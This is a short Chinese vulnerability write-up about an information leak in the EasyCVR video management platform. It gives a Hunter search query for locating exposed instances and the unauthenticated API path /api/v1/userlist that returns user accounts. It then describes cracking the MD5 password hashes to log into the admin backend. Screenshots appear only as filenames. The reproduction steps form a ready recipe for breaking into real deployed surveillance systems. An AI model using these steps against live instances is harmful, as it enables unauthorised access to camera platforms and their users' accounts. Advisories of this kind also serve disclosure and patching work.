登录 白背景

EasyCVR 视频管理平台userlist存在信息泄露

一、漏洞简介

EasyCVR 视频管理平台是 TSINGSEE 青犀视频旗下一款软硬一体的产品,可提供多协议的设备接入、采集、AI 智能检测、处理、分发等服务,攻击者可通过泄露的账户密码登录后台,从而进一步攻击。

二、影响版本

  • EasyCVR 视频管理平台

三、资产测绘

  • hunterweb.title="EasyCVR"
  • 特征

1699021094705-867464c9-0dfb-4275-b909-1b8d11a3776d.png

四、漏洞复现

/api/v1/userlist?pageindex=0&pagesize=10

1699021118942-420b2c99-ed80-42b5-9065-a09377ab3bf8.png

md5解密

1699021134007-e5bf988d-6c73-432f-9c57-8a462840cace.png

1699021159989-6f52e3a6-4042-4c09-9d8d-7af35b1a396e.png

原文: https://www.yuque.com/xiaokp7/ocvun2/ett2s6h4oh1xn5lw